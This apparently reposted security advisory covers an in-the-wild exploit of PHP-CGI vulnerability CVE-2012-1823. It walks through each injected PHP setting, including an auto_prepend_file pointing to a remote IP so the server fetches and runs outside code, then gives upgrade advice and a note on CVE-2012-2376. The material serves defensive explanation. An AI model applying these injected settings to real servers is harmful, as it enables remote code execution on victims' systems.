FYI...PHP exploit in the wild CVE-2012-1823
Last Updated: 2012-05-28 03:48:35 UTC - "... an attempt to exploit the PHP vulnerability CVE-2012-1823* with the remote execution variant... each of the options invoked:
• safe_mode=off: PHP disables the capacity of checking if the if the owner of the current script matches the owner of the file to be operated by a file funcionality. This directive has been deprecated on PHP 5.3.0 tree and removed on PHP 5.4.0 tree.
• disable_functions=null: No function is disabled from the whole amount contained within PHP. This means that insecure functions are available like proc_open, exec, passthru, curl_exec, system, popen, curl_multi_exec and shell_exec. For more information on this functions, please check the PHP manual***.
• allow_url_fopen=on: This directive allows PHP to open files located in http or ftp locations and operate them as a normal file descriptor.
• allow_url_include=on:This directive allows to include additional PHP code located in a http or ftp URL into the PHP file before being processed and executed.
• auto_prepend_file=http://220.127.116.11/info3.php: This directive includes the PHP code located in http://18.104.22.168/info3.php
and execute it before the code inside index.php.You can prevent this
by using the latest stable PHP version located at the downloads page (1). If you are using windows... you can be affected by the CVE-2012-2376 (2). For more information regarding remediation on this vulnerability, please check my previous diary** ..."
- 7.5 (HIGH)
- 10.0 (HIGH)
Last revised: 05/21/2012
Overview: Buffer overflow in the com_print_typeinfo function in PHP 5.4.3 and earlier on Windows allows remote attackers to execute arbitrary code via crafted arguments that trigger incorrect handling of COM object VARIANT types, as exploited in the wild
in May 2012...